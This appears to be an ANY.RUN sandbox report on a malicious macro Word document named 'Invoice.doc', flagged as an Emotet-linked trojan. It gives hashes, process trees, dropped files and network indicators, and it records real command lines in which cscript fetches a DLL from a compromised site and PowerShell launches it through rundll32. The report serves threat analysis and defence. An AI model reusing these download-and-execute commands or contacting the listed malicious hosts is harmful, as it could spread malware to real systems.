analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

Invoice.doc

Full analysis: https://app.any.run/tasks/0ba53a31-e6bf-4343-b28e-770452577622
Verdict: Malicious activity
Threats:

Trojans are a group of malicious programs distinguished by their ability to masquerade as benign software. Depending on their type, trojans possess a variety of capabilities, ranging from maintaining full remote control over the victim’s machine to stealing data and files, as well as dropping other malware. At the same time, the main functionality of each trojan family can differ significantly depending on its type. The most common trojan infection chain starts with a phishing email.

Malware Trends Tracker     >>>
Analysis date: March 30, 2020, 23:00:47
OS: Windows 10 Professional (build: 16299, 64 bit)
Tags:
macros
macros-on-open
trojan
Indicators:
MIME: application/vnd.openxmlformats-officedocument.wordprocessingml.document
File info: Microsoft Word 2007+
MD5:

92826793628D5D2F1D4CC7C304289B7F

SHA1:

72C8B24336C8D0C6180E1DF9B11EDE455C264465

SHA256:

73C199BC870AB86003D3184D56140534FC90F245A0866C11AC8992F4C9C048F5

SSDEEP:

3072:4VDHhd5A6trmYodxLrOa5nctJTDS+qMWucre+IA:4DBdNtrmxxLrO0nUJTDJ7j+f

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Starts CMD.EXE for commands execution

      • WINWORD.EXE (PID: 5440)

    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 5440)

    • Executes PowerShell scripts

      • cmd.exe (PID: 5676)

    • Loads dropped or rewritten executable

      • rundll32.exe (PID: 2616)

    • Changes the autorun value in the registry

      • msiexec.exe (PID: 404)

  • SUSPICIOUS

    • Executes scripts

      • cmd.exe (PID: 5676)

    • Executable content was dropped or overwritten

      • cscript.exe (PID: 4544)
      • msiexec.exe (PID: 404)

    • Reads the machine GUID from the registry

      • cscript.exe (PID: 4544)
      • powershell.exe (PID: 5960)
      • msiexec.exe (PID: 404)
      • backgroundTaskHost.exe (PID: 6052)
      • SpeechRuntime.exe (PID: 3668)

    • Creates files in the user directory

      • msiexec.exe (PID: 404)
      • SystemSettings.exe (PID: 5808)

    • Uses RUNDLL32.EXE to load library

      • powershell.exe (PID: 5960)
      • rundll32.exe (PID: 2836)

    • Uses NETSTAT.EXE to discover network connections

      • cmd.exe (PID: 5676)

    • Executed via COM

      • ApplicationFrameHost.exe (PID: 4216)
      • SystemSettings.exe (PID: 5808)
      • RuntimeBroker.exe (PID: 5380)
      • backgroundTaskHost.exe (PID: 6052)
      • SpeechRuntime.exe (PID: 3668)

    • Checks supported languages

      • SystemSettings.exe (PID: 5808)
      • backgroundTaskHost.exe (PID: 6052)

  • INFO

    • Reads Environment values

      • WINWORD.EXE (PID: 5440)

    • Creates files in the user directory

      • WINWORD.EXE (PID: 5440)

    • Scans artifacts that could help determine the target

      • WINWORD.EXE (PID: 5440)

    • Reads the machine GUID from the registry

      • WINWORD.EXE (PID: 5440)

    • Reads the software policy settings

      • powershell.exe (PID: 5960)
      • msiexec.exe (PID: 404)

    • Reads settings of System Certificates

      • powershell.exe (PID: 5960)
      • msiexec.exe (PID: 404)

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 5440)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.docm | Word Microsoft Office Open XML Format document (with Macro) (53.6)
.docx | Word Microsoft Office Open XML Format document (24.2)
.zip | Open Packaging Conventions container (18)
.zip | ZIP compressed archive (4.1)

EXIF

XML

AppVersion: 16
HyperlinksChanged: No
SharedDoc: No
CharactersWithSpaces: 1
LinksUpToDate: No
Company: -
ScaleCrop: No
Paragraphs: 1
Lines: 1
DocSecurity: None
Application: Microsoft Office Word
Characters: 1
Words: -
Pages: 1
TotalEditTime: 11 minutes
Template: Normal
ModifyDate: 2020:03:29 20:05:00Z
CreateDate: 2020:03:28 04:59:00Z
RevisionNumber: 5
LastModifiedBy: fjqowisuqwodi
Keywords: -

XMP

Description: -
Creator: user
Subject: -
Title: -

ZIP

ZipFileName: [Content_Types].xml
ZipUncompressedSize: 1503
ZipCompressedSize: 399
ZipCRC: 0x3f450766
ZipModifyDate: 1980:01:01 00:00:00
ZipCompression: Deflated
ZipBitFlag: 0x0006
ZipRequiredVersion: 20
No data.
screenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
105
Monitored processes
15
Malicious processes
2
Suspicious processes
4

Behavior graph

Click at the process to see the details
start winword.exe cmd.exe no specs conhost.exe no specs cscript.exe powershell.exe no specs rundll32.exe no specs rundll32.exe no specs tracert.exe no specs netstat.exe no specs msiexec.exe applicationframehost.exe no specs systemsettings.exe no specs runtimebroker.exe no specs backgroundtaskhost.exe no specs speechruntime.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
5440"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\admin\Desktop\Invoice.doc" /o ""C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
16.0.12026.20264
5676C:\WINDOWS\system32\cmd.exe /c c:\InstallShield\scrpt.batC:\WINDOWS\system32\cmd.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
1
Version:
10.0.16299.15 (WinBuild.160101.0800)
84\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\WINDOWS\system32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.16299.15 (WinBuild.160101.0800)
4544cscript //nologo c:\InstallShield\Shield18.vbs http://restorefutureschool.com/wp-includes/customize/class-wp-customize-partial.dll C:\InstallShield\vShield.dllC:\WINDOWS\system32\cscript.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Console Based Script Host
Exit code:
0
Version:
5.812.10240.16384
5960powershell -C Sleep -s 3;rundll32 C:\InstallShield\vShield.dll, DllRegisterServerC:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.16299.15 (WinBuild.160101.0800)
2836"C:\WINDOWS\system32\rundll32.exe" C:\InstallShield\vShield.dll DllRegisterServerC:\WINDOWS\system32\rundll32.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows host process (Rundll32)
Exit code:
0
Version:
10.0.16299.15 (WinBuild.160101.0800)
2616"C:\WINDOWS\system32\rundll32.exe" C:\InstallShield\vShield.dll DllRegisterServerC:\WINDOWS\SysWOW64\rundll32.exerundll32.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows host process (Rundll32)
Exit code:
0
Version:
10.0.16299.15 (WinBuild.160101.0800)
5812TRACERT https://www.marketwatch.com/investingC:\WINDOWS\system32\TRACERT.EXEcmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
TCP/IP Traceroute Command
Exit code:
1
Version:
10.0.16299.15 (WinBuild.160101.0800)
5532NETSTATC:\WINDOWS\system32\NETSTAT.EXEcmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
TCP/IP Netstat Command
Exit code:
0
Version:
10.0.16299.15 (WinBuild.160101.0800)
404msiexec.exeC:\WINDOWS\SysWOW64\msiexec.exe
rundll32.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows® installer
Version:
5.0.16299.15 (WinBuild.160101.0800)
Total events
4 313
Read events
3 740
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
2
Text files
69
Unknown types
5

Dropped files

PID
Process
Filename
Type
5440WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\UAVPW6PLBFGKNGIUL2AO.temp
MD5:
SHA256:
5440WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\L6GXEEU48G3KI8IPFGEY.temp
MD5:
SHA256:
5440WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dattext
MD5:13202B0818946C093278D1DB2AF49E40
SHA256:950F726463D81206F5C900EC52C0E8DA77F6A23309AFBA79DD55B69F5E66B5BD
5676cmd.exeC:\InstallShield\Shield18.vbstext
MD5:D18A5D8C084BFA48171A2B7360D8760B
SHA256:20F9CE239349C72802F046838CF774EA9CB7D05CF396839B9F0E2DB7A044584A
5440WINWORD.EXEC:\InstallShield\scrpt.battext
MD5:76446D2AE893FA77B6443BBDB99492FC
SHA256:7A8E4C8D6FA6468421AA6038C201ABD4B8E140C38CC3647D2BF931F31B7C610F
5440WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:425EE052EA9A5647C99B32F370FDA17D
SHA256:3993870DAD7E94ABDC7B8D269111B5223D4315210D11AE4E3A02DA1F37007BD5
5440WINWORD.EXEC:\Users\admin\Desktop\~$nvoice.docpgc
MD5:D237027DE75FE605FD90D33EF1E97870
SHA256:E7D633EC9520E2E5F8273B0E742735468B59F88A30D47912527FDF1FF4812309
5440WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\Invoice.doc.LNKlnk
MD5:B102EFC309460E3CFD3D091D67750D5E
SHA256:6BF3CDD45A87FBC3ECF812705537DDA26D6E3B8C2A80AB332D2F12A57CFB5AAC
5440WINWORD.EXEC:\Users\admin\AppData\Local\Temp\.sestext
MD5:DE4F7D26A24B934B7558521D444760A6
SHA256:D48DAF87F68846E347461AB05F96EC858669861AA29146A6278AB41A13E3D1DA
5440WINWORD.EXEC:\Users\admin\AppData\Local\Temp\VBE\MSForms.exdtlb
MD5:9A7CDE74CEB5668CE936D1BE5BC5492C
SHA256:76A73FA5903C088BE83416CEE2D2D768E30E3CD171FF7E14B8DD0A396A86D57E
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
1
TCP/UDP connections
7
DNS requests
24
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
4544
cscript.exe
GET
301
198.187.29.233:80
http://restorefutureschool.com/wp-includes/customize/class-wp-customize-partial.dll
US
html
292 b
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
5440
WINWORD.EXE
52.114.132.34:443
self.events.data.microsoft.com
Microsoft Corporation
US
unknown
5440
WINWORD.EXE
13.107.3.128:443
config.edge.skype.com
Microsoft Corporation
US
whitelisted
4544
cscript.exe
198.187.29.233:80
restorefutureschool.com
Namecheap, Inc.
US
malicious
4544
cscript.exe
198.187.29.233:443
restorefutureschool.com
Namecheap, Inc.
US
malicious
404
msiexec.exe
185.141.24.57:443
105711.com
Host Sailor Ltd.
RO
malicious
5220
svchost.exe
20.191.48.196:443
settings-win-ppe.data.microsoft.com
Microsoft Corporation
US
unknown

DNS requests

Domain
IP
Reputation
config.edge.skype.com
  • 13.107.3.128
whitelisted
restorefutureschool.com
  • 198.187.29.233
malicious
self.events.data.microsoft.com
  • 52.114.132.34
  • 52.114.77.164
whitelisted
settings-win-ppe.data.microsoft.com
  • 20.191.48.196
whitelisted
105711.com
  • 185.141.24.57
  • 162.255.119.253
malicious
209711.com
malicious
106311.com
unknown
124331.com
unknown

Threats

PID
Process
Class
Message
4544
cscript.exe
A Network Trojan was detected
AV TROJAN Possible infected Wordpress - Payload download attempt
404
msiexec.exe
A Network Trojan was detected
MALWARE [PTsecurity] Emotet SSL Certificate Detected
404
msiexec.exe
A Network Trojan was detected
MALWARE [PTsecurity] Emotet SSL Certificate Detected
1 ETPRO signatures available at the full report
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2024 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
Invoice.doc